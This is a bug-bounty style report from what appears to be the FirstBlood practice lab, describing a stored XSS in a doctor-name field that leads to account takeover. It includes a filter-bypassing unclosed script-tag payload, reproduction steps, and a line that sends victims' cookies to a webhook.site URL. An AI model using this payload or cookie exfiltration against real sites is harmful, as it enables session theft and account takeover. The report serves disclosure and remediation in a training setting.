FirstBlood-#1379ATO with stored XSS in doctor name
This issue was discovered on FirstBlood v3



On 2022-12-09, pichik Level 4 reported:

Hi,

DESCRIPTION

I found that name of doctors is vulnerable to stored XSS.
There is poor filter applied, which encodes special character if closing tag > is present,
but this can be easily bypassed just by not using it.

I found an easiest way for this to use external script with <script src=''> tag. Here is full payload with not closed script tag: <script+src='https://yourdomain.com/alert.js'+id='

SETPS TO REPRODUCE:

  1. Create file named alert.js in your domain, or localhost, with just alert(1) in it.
  2. Go to this endpoint, use ID of any doctor:
    https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
  3. Intercept request while submitting changes.
  4. Change parameter name=<script+src='https://yourdomain.com/alert.js'+id='
  5. Now if you have, or create new appointment with corresponding doctor alert will be triggered, when you visit your appointment (this require to set payload to drid=1):
    https://019046743f9e-pichik.a.firstbloodhackers.com/manageappointment.php?success&aptid=[appointment-id]
    And also if you visit find doctor endpoint:
    https://019046743f9e-pichik.a.firstbloodhackers.com/doctors.php
    https://019046743f9e-pichik.a.firstbloodhackers.com/meet_drs.php
    or if the doctor is doctor of the month:
    https://019046743f9e-pichik.a.firstbloodhackers.com/about.php

You can also add redirection to your server with cookies, same as in my previous report.
Just add this to your alert.js file:
window.location.href="https://webhook.site/[id]?"+document.cookie;

POC SCREEN

REMEDIATION

Filters are never not enough as a prevention against XSS.
Best prevention is to encode every special character in every ocassion.

P2 High

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: name

Payload: <script+src='https://yourdomain.com/alert.js'+id='


FirstBlood ID: 54
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /meet_drs.php endpoint via a malicious doctors name

FirstBlood ID: 55
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /doctors.php endpoint via a malicious doctors name

FirstBlood ID: 56
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctors name

FirstBlood ID: 57
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /manageappointment.php endpoint via a malicious doctors name if the user has booked this specific doctor